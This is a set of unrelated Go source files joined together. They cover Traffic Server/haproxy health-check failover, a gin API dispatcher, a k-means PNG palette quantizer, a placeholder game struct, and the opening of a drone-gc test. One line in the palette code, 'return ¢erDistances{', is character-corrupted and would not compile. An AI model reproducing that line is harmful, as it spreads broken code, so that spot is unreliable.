			go self.parentHealthCheckByTcp(phost)
		}
	}
	return
}
// haproxyHealthCheck periodically (every Check_duration_second seconds)
// probes hhost on TCP port 80, retrying cfg.Retry times before declaring
// it down, records the result, and triggers HA failover handling.
// It runs until exitChan is closed.
func (self *App) haproxyHealthCheck(hhost string) {
	log.GetLogger().Infof("Haproxy节点健康检查开始 : %s", hhost)
	// Scheduling ticker for the periodic probe.
	ticker := time.Tick(time.Duration(self.cfg.Check_duration_second) * time.Second)
	for {
		select {
		case <-ticker:
			// Main probe body.
			log.GetLogger().Infof("HA定时健康监测 => %s", hhost)
			err := retry(self.cfg.Retry, time.Duration(self.cfg.Retry_sleep_ms)*time.Millisecond,
				func() error {
					return self.tcpPortCheck(hhost, 80)
				})
			self.updateHaproxy(hhost, err == nil)
			// React to state change (HA failover / recovery).
			self.haFailover(hhost)
		case <-self.exitChan:
			goto exit
		}
	}
exit:
	log.GetLogger().Infof("HA %s 健康监测功能退出", hhost)
	return
}
// parentHealthCheckByTcp periodically (every Check_duration_second
// seconds) probes parent phost on TCP port 80 with cfg.Retry retries,
// records the result, and runs failover logic. The parent is seeded as
// Working before the first probe. Runs until exitChan is closed.
func (self *App) parentHealthCheckByTcp(phost string) {
	// Seed the parent as healthy before the first probe.
	self.updateParent(phost, true)
	log.GetLogger().Infof("中心节点健康检查(TCP): %s", phost)
	// Scheduling ticker for the periodic probe.
	ticker := time.Tick(time.Duration(self.cfg.Check_duration_second) * time.Second)
	for {
		select {
		case <-ticker:
			// Main probe body.
			log.GetLogger().Infof("定时健康监测(TCP) -> %s", phost)
			err := retry(self.cfg.Retry, time.Duration(self.cfg.Retry_sleep_ms)*time.Millisecond,
				func() error {
					return self.tcpPortCheck(phost, 80)
				})
			self.updateParent(phost, err == nil)
			// React to state change (failover / recovery).
			self.failover(phost)
		case <-self.exitChan:
			goto exit
		}
	}
exit:
	log.GetLogger().Infof("%s 健康监测(TCP)功能退出", phost)
	return
}
// parentHealthCheck is the HTTP variant of the parent probe (currently
// unused; Startup launches parentHealthCheckByTcp instead). It GETs the
// per-parent health-check URL and treats transport errors or 5xx
// responses as "parent down", then records the result and runs
// failover. Runs until exitChan is closed.
func (self *App) parentHealthCheck(phost string) {
	// Seed the parent as healthy before the first probe.
	self.updateParent(phost, true)
	health_check_url := self.cfg.Health_check
	health_check_url = strings.Replace(health_check_url, "{parent}", phost, 1)
	log.GetLogger().Infof("上层节点健康检查URL: %s", health_check_url)
	// Scheduling ticker for the periodic probe.
	ticker := time.Tick(time.Duration(self.cfg.Check_duration_second) * time.Second)
	httpclient := util.NewFastHttpClient(500 * time.Millisecond)
	for {
		select {
		case <-ticker:
			if httpclient == nil {
				log.GetLogger().Infoln("重建httpclient")
				httpclient = util.NewFastHttpClient(500 * time.Millisecond)
			}
			// Main probe body.
			log.GetLogger().Infof("定时健康监测 -> %s", phost)
			err := retry(self.cfg.Retry, time.Duration(self.cfg.Retry_sleep_ms)*time.Millisecond, func() error {
				statusCode, body, err := httpclient.Get(nil, health_check_url)
				body = body[:0] // discard the body; only the status matters
				if err != nil {
					return err
				}
				// A 5xx from the parent counts as the server being down.
				if statusCode >= 500 {
					return ErrServerDown
				}
				return nil
			})
			self.updateParent(phost, err == nil)
			// React to state change (failover / recovery).
			self.failover(phost)
		case <-self.exitChan:
			goto exit
		}
	}
exit:
	log.GetLogger().Infof("%s 健康监测功能退出", phost)
	return
}
// haFailover reacts to the latest probe result for hhost: a non-working
// haproxy goes through forward recovery (strip it from remap.config),
// while a working one simply has its markdown flag cleared.
func (self *App) haFailover(hhost string) {
	haServer, known := self.haproxys[hhost]
	if !known {
		return
	}
	if haServer.Working {
		haServer.MarkDown = false
		return
	}
	self.forwardHaproxyRecover(haServer)
}
// failover reacts to the latest probe result for parent phost: a
// non-working parent triggers forward recovery (rewrite the ATS
// configuration), while a working one re-enables parent proxying and
// clears its markdown flag.
func (self *App) failover(phost string) {
	if parentServer, ok := self.parents[phost]; ok {
		// if parentServer.MarkDown && parentServer.Working {
		// 	// server came back up
		// 	//self.backwardRecover(parentServer)
		// } else if !parentServer.MarkDown && !parentServer.Working {
		// 	// server became unavailable
		// 	self.forwardRecover(parentServer)
		// }
		if !parentServer.Working {
			self.forwardRecover(parentServer)
		} else {
			self.parentIsProxy = true
			parentServer.MarkDown = false
		}
	}
}
//----------------------- 正向处理(容错处理) -----------------------//
// forwardHaproxyRecover handles a haproxy node that went down: on first
// detection (not yet marked down) it strips the node from remap.config
// and reloads ATS; it always leaves the node marked down so the rewrite
// runs only once per outage.
func (self *App) forwardHaproxyRecover(haproxyServer *HaProxyServer) {
	log.GetLogger().Infof("%s >>>>>>>> forward Haproxy recover", haproxyServer.Host)
	defer func() {
		haproxyServer.MarkDown = true // remember we already handled this outage
	}()
	if !haproxyServer.MarkDown {
		self.updateRemapHaproxyConfig(haproxyServer.Host)
		self.reloadConfig()
	}
}
// forwardRecover handles a parent that went down: on first detection it
// rewrites parent.config with the surviving parents and, when ALL
// parents are down, switches ATS to origin mode (disable parent
// routing, swap in the origin remap rules), then reloads ATS. The
// parent is always left marked down so the rewrite runs once per outage.
func (self *App) forwardRecover(parentServer *ParentServer) {
	log.GetLogger().Infof("%s >>>>>>>> forward recover", parentServer.Host)
	defer func() {
		parentServer.MarkDown = true // remember we already handled this outage
	}()
	if !parentServer.MarkDown {
		self.updateParentConfig()
		// Every parent is unreachable: stop proxying through parents.
		if self.parentIsProxy && len(self.getNotWorkingParentsHosts()) == len(self.GetParentsHosts()) {
			self.forwardRecordsConfig()
			self.forwardRemapConfig()
			self.parentIsProxy = false // parent-proxying is now off
		}
		self.reloadConfig()
	}
}
// forwardRecordsConfig disables ATS parent-proxy routing by rewriting
// proxy.config.http.parent_proxy_routing_enable to 0 in records.config.
func (self *App) forwardRecordsConfig() {
	const disabled = "0"
	sedTemplate := `sed -i 's/CONFIG[ ][ ]*proxy.config.http.parent_proxy_routing_enable[ ][ ]*INT[ ][ ]*.*/CONFIG proxy.config.http.parent_proxy_routing_enable INT %s/g' %s`
	shellCmd := fmt.Sprintf(sedTemplate, disabled, self.cfg.Records_config_path)
	log.GetLogger().Infof("update forward records config command: %s", shellCmd)
	util.ShellRun(shellCmd)
}
// forwardRemapConfig swaps the live ATS remap.config for the
// parent-outage variant (remap_parent.config shipped next to the app
// config file), backing up the original first; it is a no-op when the
// backup fails.
func (self *App) forwardRemapConfig() {
	// Back up the current file before overwriting it.
	bf := util.BackupFile(self.cfg.Remap_config_path)
	if bf != "" {
		log.GetLogger().Info("备份remap成功")
		// Replace the live file with the outage variant.
		dir := filepath.Dir(self.cfg.filepath)
		sourceFile := filepath.Join(dir, "remap_parent.config")
		cmd := fmt.Sprintf("cp -r %s %s", sourceFile, self.cfg.Remap_config_path)
		log.GetLogger().Info("forward cmd :", cmd)
		util.ShellRun(cmd)
	}
}
//----------------------- 反向处理(恢复处理) -----------------------//
// backwardRecover restores a parent that came back up (currently only
// referenced from commented-out code in failover): it rewrites
// parent.config and, when ATS had been switched to origin mode,
// restores the edge remap rules and re-enables parent routing, then
// reloads ATS. The App lock is held for the whole operation.
func (self *App) backwardRecover(parentServer *ParentServer) {
	log.GetLogger().Infof("%s backward recover", parentServer.Host)
	self.Lock()
	defer func() {
		parentServer.MarkDown = false // outage handled; clear the flag
		self.Unlock()
	}()
	if parentServer.MarkDown {
		self.updateParentConfig()
		// We had previously fallen back to the origin site.
		if !self.parentIsProxy {
			self.backwardRemapConfig()
			self.backwardRecordsConfig()
		}
		self.reloadConfig()
	}
}
// backwardRecordsConfig re-enables ATS parent-proxy routing by setting
// proxy.config.http.parent_proxy_routing_enable back to 1 in
// records.config.
func (self *App) backwardRecordsConfig() {
	field := "1"
	//cmd := strings.Replace(self.cfg.Setup_records_config_cmd, "{PARENTS_ENBALE}", field, 1)
	testCmd := `sed -i 's/CONFIG[ ][ ]*proxy.config.http.parent_proxy_routing_enable[ ][ ]*INT[ ][ ]*.*/CONFIG proxy.config.http.parent_proxy_routing_enable INT %s/g' %s`
	cmd := fmt.Sprintf(testCmd, field, self.cfg.Records_config_path)
	util.ShellRun(cmd)
}
// backwardRemapConfig restores the edge-mode remap rules by copying
// remap_edge.config (shipped alongside the app config file) over the
// live ATS remap.config.
func (self *App) backwardRemapConfig() {
	srcDir := filepath.Dir(self.cfg.filepath)
	edgeRemap := filepath.Join(srcDir, "remap_edge.config")
	util.ShellRun(fmt.Sprintf("cp %s %s", edgeRemap, self.cfg.Remap_config_path))
}
//----------------------- 公共方法 -----------------------//
// retry runs f up to `attempts` times, sleeping `sleep` between
// failures, and returns nil as soon as one call succeeds or the last
// error once the attempts are exhausted.
// Rewritten iteratively: the recursive original consumed one stack
// frame per retry for no benefit.
func retry(attempts int, sleep time.Duration, f func() error) error {
	var err error
	for {
		if err = f(); err == nil {
			return nil
		}
		if attempts--; attempts <= 0 {
			break
		}
		time.Sleep(sleep)
		log.GetLogger().Infoln("节点连接重试")
	}
	log.GetLogger().Infof("重试终止,节点不可用")
	return err
}
// tcpPortCheck dials host:port over TCP with a 2-second timeout.
// A nil return means the port accepted the connection (which is then
// closed immediately); otherwise the dial error is returned.
func (self *App) tcpPortCheck(host string, port uint32) error {
	addr := fmt.Sprintf("%s:%d", host, port)
	conn, err := net.DialTimeout("tcp", addr, 2*time.Second)
	if err != nil {
		log.GetLogger().Errorf("tcp connect to %s fail !", addr)
		return err
	}
	defer conn.Close()
	return nil
}
// updateRemapHaproxyConfig strips the downed haproxy host from every
// @pparam entry of the live ATS remap.config, under the App lock.
// Fix: the first Infof call had no %s verb for hhost, so `go vet`
// flags it and the host was appended as `%!(EXTRA ...)` noise.
func (self *App) updateRemapHaproxyConfig(hhost string) {
	self.Lock()
	defer self.Unlock()
	log.GetLogger().Infof("update remap proxy config by host: %s", hhost)
	testCmd := `sed -i 's/@pparam=%s//g' %s`
	cmd := fmt.Sprintf(testCmd, hhost, self.cfg.Remap_config_path)
	log.GetLogger().Infof("update parent config command: %s", cmd)
	util.ShellRun(cmd)
}
// updateParentConfig rewrites the parent="..." rule of ATS
// parent.config with the currently working parents (joined by ";").
// The two random sleeps (0-6s plus 0-990ms) stagger concurrent rewrites
// coming from the per-parent checker goroutines.
// NOTE(review): unlike updateParent/updateHaproxy this method takes no
// lock, so concurrent sed invocations remain possible — confirm whether
// the random jitter is considered sufficient protection.
func (self *App) updateParentConfig() {
	sleep1 := time.Duration(rand.Int63n(7)) * time.Second
	time.Sleep(sleep1)
	sleep2 := time.Duration(rand.Int63n(100)*10) * time.Millisecond
	time.Sleep(sleep2)
	pws := strings.Join(self.getWorkingParentsHosts(), ";")
	testCmd := `sed -i 's/[^#].*parent=".*/dest_domain=. method=get parent="%s" round_robin=consistent_hash/g' %s`
	cmd := fmt.Sprintf(testCmd, pws, self.cfg.Parents_config_path)
	log.GetLogger().Infof("update parent config command: %s", cmd)
	util.ShellRun(cmd)
}
// updateParent records the latest health-check verdict for phost under
// the App lock, creating the ParentServer entry on first sight.
func (self *App) updateParent(phost string, working bool) {
	self.Lock()
	defer self.Unlock()
	srv, known := self.parents[phost]
	if !known {
		srv = &ParentServer{Host: phost}
		self.parents[phost] = srv
	}
	srv.Working = working
}
// updateHaproxy records the latest health-check verdict for hhost under
// the App lock, creating the HaProxyServer entry on first sight.
func (self *App) updateHaproxy(hhost string, working bool) {
	self.Lock()
	defer self.Unlock()
	srv, known := self.haproxys[hhost]
	if !known {
		srv = &HaProxyServer{Host: hhost}
		self.haproxys[hhost] = srv
	}
	srv.Working = working
}
// GetParentsHosts returns the hosts of every known parent server, in
// map-iteration (i.e. unspecified) order.
func (self *App) GetParentsHosts() []string {
	hosts := []string{}
	for _, srv := range self.parents {
		hosts = append(hosts, srv.Host)
	}
	return hosts
}
// getWorkingHaproxyHosts returns the hosts of haproxy servers whose
// last probe succeeded; the receiver lock guards the haproxys map.
func (self *App) getWorkingHaproxyHosts() []string {
	self.Lock()
	defer self.Unlock()
	alive := []string{}
	for _, srv := range self.haproxys {
		if !srv.Working {
			continue
		}
		alive = append(alive, srv.Host)
	}
	return alive
}
// getWorkingParentsHosts returns the host of every parent whose last
// probe succeeded, each normalized to carry a ":80" port suffix, for
// use in the parent="..." line written by updateParentConfig.
//
// Fix: the normalized ph was computed but the original appended the raw
// ps.Host, silently dropping the ":80" suffix the normalization was
// written to add.
func (self *App) getWorkingParentsHosts() []string {
	self.Lock()
	defer self.Unlock()
	contents := []string{}
	for _, ps := range self.parents {
		ph := ps.Host
		if !strings.Contains(ph, ":80") {
			ph = ph + ":80"
		}
		if ps.Working {
			contents = append(contents, ph)
		}
	}
	return contents
}
// getNotWorkingParentsHosts returns the hosts of parents whose last
// probe failed; the receiver lock guards the parents map.
func (self *App) getNotWorkingParentsHosts() []string {
	self.Lock()
	defer self.Unlock()
	down := []string{}
	for _, srv := range self.parents {
		if srv.Working {
			continue
		}
		down = append(down, srv.Host)
	}
	return down
}
// reloadConfig asks ATS to reload its configuration via the ats.sh
// helper script and logs the script's output (errors are logged, not
// propagated).
func (self *App) reloadConfig() {
	cmd := "sudo sh /apps/sh/ats.sh reload"
	res, err := util.String(cmd)
	if err != nil {
		log.GetLogger().Error(err)
	}
	log.GetLogger().Infof("reload result: %s", res)
}
// Shutdown stops all health-check goroutines by closing exitChan.
// NOTE(review): a second call would panic on the double close — confirm
// callers invoke it at most once.
func (self *App) Shutdown(i interface{}) {
	close(self.exitChan)
	log.GetLogger().Infoln("应用服务关闭!!!")
}
|
package api
import (
"octlink/mirage/src/modules/session"
"octlink/mirage/src/utils/httpresponse"
"octlink/mirage/src/utils/merrors"
"octlink/mirage/src/utils/octlog"
"octlink/mirage/src/utils/octmysql"
"github.com/gin-gonic/gin"
)
type ApiResponse struct {
Error int `json:"error"`
ErrorLog string `json:"errorLog"`
Data interface{} `json:"data"`
}
/*
{
"module": "octlink.mirage.center.host.APIAddHost",
"paras": {
"ip": "kk",
"account": "root",
"password": ""
},
"async": false,
"session": {
"uuid": "00000000000000000000000000000000",
"skey": "00000000000000000000000000000000"
}
}
*/
type InputParas struct {
Module string
Api string
Paras map[string]interface{}
Async bool
Session map[string]interface{}
}
type ApiParas struct {
Proto *ApiProto
Session *session.Session
InParas *InputParas
Db *octmysql.OctMysql
}
// ApiTest is a liveness endpoint that simply reports the API server is
// up and reachable.
func (api *Api) ApiTest(c *gin.Context) {
	httpresponse.Ok(c, "Api Server is Running")
}
var GApiServices map[string]*ApiService
type ApiService struct {
Name string `json:"name"`
Handler func(*ApiParas) *ApiResponse `json:"handler"`
}
// GetApiService looks up the registered handler for key in the global
// service table, logging and returning nil when no such service exists.
func GetApiService(key string) *ApiService {
	if service, found := GApiServices[key]; found {
		return service
	}
	octlog.Error("no service for %s found\n", key)
	return nil
}
// SessionExceptions lists the APIs that may be invoked without an
// authenticated session (the login entry points themselves).
var SessionExceptions = []string{
	"octlink.mirage.center.account.APILoginByAccount",
	"octlink.mirage.center.user.APILoginByUser",
}

// NeedSessionCheck reports whether the named API requires a valid
// session; the login APIs in SessionExceptions do not.
func NeedSessionCheck(api string) bool {
	for i := range SessionExceptions {
		if SessionExceptions[i] == api {
			return false
		}
	}
	return true
}
// getApiParas parses the request envelope into an ApiParas: it binds
// the JSON body, resolves the API proto, and (unless the API is a login
// exception) validates the caller's session. On failure it returns a
// nil ApiParas plus a merrors error code.
func getApiParas(c *gin.Context) (*ApiParas, int) {
	var sid string
	apiParas := new(ApiParas)
	// The BindJSON error was previously ignored: on a malformed body
	// InParas stayed nil and the dereference below panicked.
	if err := c.BindJSON(&apiParas.InParas); err != nil || apiParas.InParas == nil {
		octlog.Error("failed to bind request body\n")
		return nil, merrors.ERR_NOT_ENOUGH_PARAS
	}
	octlog.Debug("got api %s\n", apiParas.InParas.Api)
	if apiParas.InParas.Api == "" {
		octlog.Error("got null api\n")
		return nil, merrors.ERR_NO_SUCH_API
	}
	proto := FindApiProto(apiParas.InParas.Api)
	if proto == nil {
		octlog.Error("no api proto found for %s\n",
			apiParas.InParas.Api)
		return nil, merrors.ERR_NO_SUCH_API
	}
	apiParas.Proto = proto
	apiParas.Db = new(octmysql.OctMysql)
	if NeedSessionCheck(apiParas.InParas.Api) {
		// comma-ok assertion: a missing or non-string uuid must not panic.
		uuid, ok := apiParas.InParas.Session["uuid"].(string)
		if !ok {
			octlog.Error("session uuid missing in request\n")
			return nil, merrors.ERR_USER_NOT_LOGIN
		}
		sid = uuid
	} else {
		sid = session.SESSION_DEFAULT_ID
	}
	octlog.Debug("found session id " + sid)
	// Named sess to avoid shadowing the imported session package.
	sess := session.FindSession(apiParas.Db, sid)
	if sess == nil {
		octlog.Error("not session found for this id" + sid)
		return nil, merrors.ERR_USER_NOT_LOGIN
	}
	apiParas.Session = sess
	return apiParas, 0
}
// checkParas validates the input parameters against the API proto:
// optional parameters absent from the input get their declared default,
// and required (PARAM_NOT_NULL) parameters must be present as non-empty
// strings. Returns ERR_OCT_SUCCESS and "" on success, otherwise
// ERR_NOT_ENOUGH_PARAS with a message naming the offending parameter.
func checkParas(apiParas *ApiParas) (int, string) {
	protoParas := apiParas.Proto.Paras
	for i := 0; i < len(protoParas); i++ {
		protoParam := protoParas[i]
		inParam := apiParas.InParas.Paras[protoParam.Name]
		// if paras have default value and no input sepecified, set a default value
		if protoParam.Default != PARAM_NOT_NULL && inParam == nil {
			apiParas.InParas.Paras[protoParam.Name] = protoParam.Default
		}
		octlog.Debug("param:%s, default:%s, value:%s\n", protoParam.Name,
			protoParam.Default, inParam)
		if protoParam.Default == PARAM_NOT_NULL {
			// comma-ok assertion: the old inParam.(string) panicked when a
			// required parameter was absent (nil interface) or not a string.
			value, ok := inParam.(string)
			if !ok || value == "" {
				errorMsg := "paras \"" + protoParam.Name + "\" must be specified"
				return merrors.ERR_NOT_ENOUGH_PARAS, errorMsg
			}
		}
	}
	return merrors.ERR_OCT_SUCCESS, ""
}
// ApiDispatch is the single gin entry point for all API calls: it
// parses and validates the request envelope, resolves the named
// service, checks parameters against the proto, invokes the handler,
// and maps the handler's ApiResponse onto the HTTP reply.
func (api *Api) ApiDispatch(c *gin.Context) {
	// NOTE(review): logged at Error level although this is a normal
	// event — probably should be Debug/Info.
	octlog.Error("got api request\n")
	paras, err := getApiParas(c)
	if paras == nil {
		// err here is the merrors error *code* returned by getApiParas.
		octlog.Error("No match proto found\n")
		httpresponse.Error(c, err, nil)
		return
	}
	service := GetApiService(paras.InParas.Api)
	if service == nil {
		octlog.Error("No match service found\n")
		httpresponse.Error(c, merrors.ERR_NO_SUCH_API, paras.InParas.Api)
		return
	}
	ret, msg := checkParas(paras)
	if ret != merrors.ERR_OCT_SUCCESS {
		octlog.Error("Not Enough Paras\n")
		httpresponse.Error(c, merrors.ERR_NOT_ENOUGH_PARAS, msg)
		return
	}
	resp := service.Handler(paras)
	// Close the DB handle allocated in getApiParas once the reply is sent.
	defer paras.Db.Close()
	if resp.Error == 0 {
		httpresponse.Ok(c, resp.Data)
	} else {
		httpresponse.Error(c, resp.Error, resp.ErrorLog)
	}
}
|
package smallpng
import (
"image"
"image/color"
"math/rand"
"runtime"
"sync"
)
// DefaultMaxKMeansIters is the default maximum number of
// iterations of the k-means algorithm for clustering.
const DefaultMaxKMeansIters = 5
// DefaultPaletteSize is the default number of colors in a
// color palette.
const DefaultPaletteSize = 256
// DefaultMaxClusterPixels is the default number of pixels
// to randomly subsample from an image for clustering.
const DefaultMaxClusterPixels = 100000
// PaletteConfig determines how palette's are produced for
// images.
type PaletteConfig struct {
// MaxKMeansIters is the maximum number of clustering
// iterations. If 0, use DefaultMaxKMeansIters.
MaxKMeansIters int
// PaletteSize is the number of colors to use in the
// palette. If 0, use DefaultPaletteSize.
PaletteSize int
// MaxClusterPixels is the maximum number of pixels to
// use as data-points for clustering. If 0, use
// DefaultMaxClusterPixels.
MaxClusterPixels int
// ColorSpace is the color space to use for computing
// pixel distances and averages.
// If unspecified, the zero value for ColorSpace is
// used.
ColorSpace ColorSpace
}
// setDefaults returns a copy of p in which every zero-valued tuning
// knob has been replaced by its package-level default.
func (p PaletteConfig) setDefaults() PaletteConfig {
	out := p
	if out.MaxKMeansIters == 0 {
		out.MaxKMeansIters = DefaultMaxKMeansIters
	}
	if out.PaletteSize == 0 {
		out.PaletteSize = DefaultPaletteSize
	}
	if out.MaxClusterPixels == 0 {
		out.MaxClusterPixels = DefaultMaxClusterPixels
	}
	return out
}
// PaletteImage creates a color palette for an image using
// clustering to minimize the discrepency from reduced
// colors.
//
// If p is specified, it is used to configure the palette.
// K-means runs for up to p.MaxKMeansIters additional iterations,
// stopping early once the MSE loss no longer improves.
// NOTE(review): `*p = p.setDefaults()` writes the resolved defaults
// back through the caller's pointer — confirm that mutation is
// intended.
func PaletteImage(img image.Image, p *PaletteConfig) *image.Paletted {
	if p == nil {
		p = &PaletteConfig{}
	}
	*p = p.setDefaults()
	bounds := img.Bounds()
	// Collect every pixel as a vector in the configured color space.
	colors := make([]colorVector, 0, bounds.Dx()*bounds.Dy())
	for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
		for x := bounds.Min.X; x < bounds.Max.X; x++ {
			colors = append(colors, p.ColorSpace.toVector(img.At(x, y)))
		}
	}
	// Cap the clustering workload by random subsampling.
	colors = subsampleClusterPixels(colors, p.MaxClusterPixels)
	clusters := newColorClusters(colors, p.PaletteSize)
	loss := clusters.Iterate()
	for i := 0; i < p.MaxKMeansIters; i++ {
		newLoss := clusters.Iterate()
		if newLoss >= loss {
			break
		}
		loss = newLoss
	}
	palette := make(color.Palette, p.PaletteSize)
	for i, x := range clusters.Centers {
		palette[i] = p.ColorSpace.toColor(x)
	}
	// Prevent nil colors in palette.
	for i := len(clusters.Centers); i < len(palette); i++ {
		palette[i] = palette[0]
	}
	// Re-render the image against the reduced palette.
	res := image.NewPaletted(bounds, palette)
	for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
		for x := bounds.Min.X; x < bounds.Max.X; x++ {
			res.Set(x, y, img.At(x, y))
		}
	}
	return res
}
// subsampleClusterPixels returns at most maxPixels colors chosen
// uniformly at random via a partial Fisher-Yates shuffle; the input
// slice is reordered in place.
//
// Fix: the original drew j from [0, len-i), which both re-shuffles
// already-selected positions and makes high indices reachable only in
// early rounds — a biased sample. The standard partial Fisher-Yates
// draws from [i, len).
func subsampleClusterPixels(colors []colorVector, maxPixels int) []colorVector {
	if len(colors) <= maxPixels {
		return colors
	}
	for i := 0; i < maxPixels; i++ {
		j := i + rand.Intn(len(colors)-i)
		colors[i], colors[j] = colors[j], colors[i]
	}
	return colors[:maxPixels]
}
type colorClusters struct {
Centers []colorVector
AllColors []colorVector
}
// newColorClusters builds the k-means state for allColors with at most
// numCenters centers. When the distinct colors already fit within
// numCenters, each unique color becomes its own center (exact
// clustering, no iteration needed); otherwise centers are seeded with
// k-means++.
func newColorClusters(allColors []colorVector, numCenters int) *colorClusters {
	// Optimization for the case where there are enough
	// centers to cover every mode exactly.
	uniqueColors := map[colorVector]bool{}
	for _, c := range allColors {
		uniqueColors[c] = true
	}
	if len(uniqueColors) <= numCenters {
		unique := make([]colorVector, 0, len(uniqueColors))
		for c := range uniqueColors {
			unique = append(unique, c)
		}
		return &colorClusters{
			Centers: unique,
			AllColors: allColors,
		}
	}
	return &colorClusters{
		Centers: kmeansPlusPlusInit(allColors, numCenters),
		AllColors: allColors,
	}
}
// Iterate performs a step of k-means and returns the
// current MSE loss.
// If the MSE loss does not decrease, then the process has
// converged.
//
// The assignment step is parallelized across GOMAXPROCS goroutines,
// each striding through AllColors and accumulating into private
// buffers that are merged under resultLock before the centroid update.
func (c *colorClusters) Iterate() float64 {
	centerSum := make([]colorVector, len(c.Centers))
	centerCount := make([]int, len(c.Centers))
	totalError := 0.0
	numProcs := runtime.GOMAXPROCS(0)
	var resultLock sync.Mutex
	var wg sync.WaitGroup
	for i := 0; i < numProcs; i++ {
		wg.Add(1)
		go func(idx int) {
			defer wg.Done()
			localCenterSum := make([]colorVector, len(c.Centers))
			localCenterCount := make([]int, len(c.Centers))
			localTotalError := 0.0
			for i := idx; i < len(c.AllColors); i += numProcs {
				co := c.AllColors[i]
				closestDist := 0.0
				closestIdx := 0
				// The i == 0 clause seeds closestDist from the first center.
				for i, center := range c.Centers {
					d := float64(co.DistSquared(center))
					if d < closestDist || i == 0 {
						closestDist = d
						closestIdx = i
					}
				}
				localCenterSum[closestIdx] = localCenterSum[closestIdx].Add(co)
				localCenterCount[closestIdx]++
				localTotalError += closestDist
			}
			// Merge this worker's partial sums into the shared buffers.
			resultLock.Lock()
			defer resultLock.Unlock()
			for i, c := range localCenterCount {
				centerCount[i] += c
			}
			for i, s := range localCenterSum {
				centerSum[i] = centerSum[i].Add(s)
			}
			totalError += localTotalError
		}(i)
	}
	wg.Wait()
	// Update step: move each center to the mean of its assigned colors;
	// centers with no assignments keep their previous position.
	for i, newCenter := range centerSum {
		count := centerCount[i]
		if count > 0 {
			c.Centers[i] = newCenter.Scale(1 / float32(count))
		}
	}
	return totalError / float64(len(c.AllColors))
}
// kmeansPlusPlusInit seeds numCenters cluster centers with the
// k-means++ scheme: the first center is uniform-random; each later one
// is drawn with probability proportional to its squared distance from
// the nearest center chosen so far.
func kmeansPlusPlusInit(allColors []colorVector, numCenters int) []colorVector {
	centers := make([]colorVector, numCenters)
	centers[0] = allColors[rand.Intn(len(allColors))]
	dists := newCenterDistances(allColors, centers[0])
	for i := 1; i < numCenters; i++ {
		sampleIdx := dists.Sample()
		centers[i] = allColors[sampleIdx]
		dists.Update(centers[i])
	}
	return centers
}
type centerDistances struct {
AllColors []colorVector
Distances []float64
DistanceSum float64
}
func newCenterDistances(allColors []colorVector, center colorVector) *centerDistances {
dists := make([]float64, len(allColors))
sum := 0.0
for i, c := range allColors {
dists[i] = float64(c.DistSquared(center))
sum += dists[i]
}
return ¢erDistances{
AllColors: allColors,
Distances: dists,
DistanceSum: sum,
}
}
// Update folds a newly chosen center into the cached per-color minimum
// squared distances and recomputes their sum.
func (c *centerDistances) Update(newCenter colorVector) {
	total := 0.0
	for i, col := range c.AllColors {
		if d := float64(col.DistSquared(newCenter)); d < c.Distances[i] {
			c.Distances[i] = d
		}
		total += c.Distances[i]
	}
	c.DistanceSum = total
}
// Sample draws an index with probability proportional to its cached
// squared distance (the k-means++ seeding distribution).
func (c *centerDistances) Sample() int {
	remaining := rand.Float64() * c.DistanceSum
	for i, d := range c.Distances {
		remaining -= d
		if remaining < 0 {
			return i
		}
	}
	// Floating-point slack: fall back to the last index.
	return len(c.AllColors) - 1
}
|
package mesg
// Soldier describes a unit's static attributes as serialized to JSON.
type Soldier struct {
	Id int `json:"id"` //soldier id
	Rarity int `json:"rarity"` //soldier rarity
	Unlockarena int `json:"unlockarena"` //arena stage at which the soldier unlocks
	Combatpoints int `json:"combatpoints"` //combat power
	Name string `json:"name"` //display name
	Cvc int `json:"cvc"` //cvc client version code
}
// PrintRarity returns the rarity for the given soldier id, or -1 when
// there is no match.
// NOTE(review): soldier is the zero value, so Id and Rarity are always
// 0 — only id == 0 ever matches, and then 0 is returned. This looks
// like placeholder logic missing a real data source; confirm intent.
func PrintRarity (id int) int {
	var soldier Soldier
	if id == soldier.Id {
		return soldier.Rarity
	}
	return -1
}
// PrintCombatPoints returns the combat power for the given soldier id,
// or -1 when there is no match.
// NOTE(review): same placeholder pattern as PrintRarity — the zero-value
// Soldier means only id == 0 matches and 0 is returned; confirm intent.
func PrintCombatPoints (id int) int {
	var soldier Soldier
	if id == soldier.Id {
		return soldier.Combatpoints
	}
	return -1
}
// PrintCvcSoldier takes a rarity, the current unlock stage, and a cvc
// (client version code) and returns the name of a matching unlocked,
// cvc-valid soldier, or "Error" when there is no match.
// NOTE(review): soldier is the zero value, so only rarity == 0 (with
// unlockarena == 1 and cvc >= 10) ever matches and "" is returned —
// placeholder logic missing a real data source; confirm intent.
func PrintCvcSoldier(rarity int, unlockarena int, cvc int) string {
	var soldier Soldier
	if (rarity == soldier.Rarity)&&(unlockarena == 1)&&(cvc >= 10){
		return soldier.Name
	}
	return "Error"
}
// main is an empty entry point.
// NOTE(review): a main function inside package mesg is never run as a
// program entry point; it appears to be leftover scaffolding.
func main() {
}
|
// Copyright 2019 Drone.IO Inc. All rights reserved.
// Use of this source code is governed by the Blue Oak Model License
// that can be found in the LICENSE file.
package gc
import (
"context"
"errors"
"fmt"
"testing"
"time"
"github.com/drone/drone-gc/mocks"
"github.com/docker/docker/api/types"
"github.com/golang/mock/gomock"
)
// TestCollectNetworks verifies that collectNetworks removes only the
// bridge network whose io.drone.expires label lies in the past; the
// unexpired and unlabeled networks get no NetworkRemove expectation,
// so touching them would fail the mock controller.
func TestCollectNetworks(t *testing.T) {
	controller := gomock.NewController(t)
	defer controller.Finish()
	mockNetworks := []types.NetworkResource{
		{Name: "a180b24e38ed", Driver: "bridge", Labels: map[string]string{"io.drone.expires": "915148800"}},
		{Name: "e3d0f1751532", Driver: "bridge", Labels: map[string]string{"io.drone.expires": fmt.Sprint(time.Now().Add(time.Hour).Unix())}},
		{Name: "bfbf8512f21e", Driver: "bridge", Labels: nil},
	}
	client := mocks.NewMockAPIClient(controller)
	client.EXPECT().NetworkList(gomock.Any(), gomock.Any()).Return(mockNetworks, nil)
	client.EXPECT().NetworkRemove(gomock.Any(), mockNetworks[0].Name).Return(nil)
	c := New(client).(*collector)
	err := c.collectNetworks(context.Background())
	if err != nil {
		t.Error(err)
	}
}
// TestCollectNetworks_MultiError verifies that collectNetworks keeps
// going after a failed removal (the second expired network is still
// removed) and that the per-network failure surfaces as a non-nil
// (multi-)error from the collector.
func TestCollectNetworks_MultiError(t *testing.T) {
	controller := gomock.NewController(t)
	defer controller.Finish()
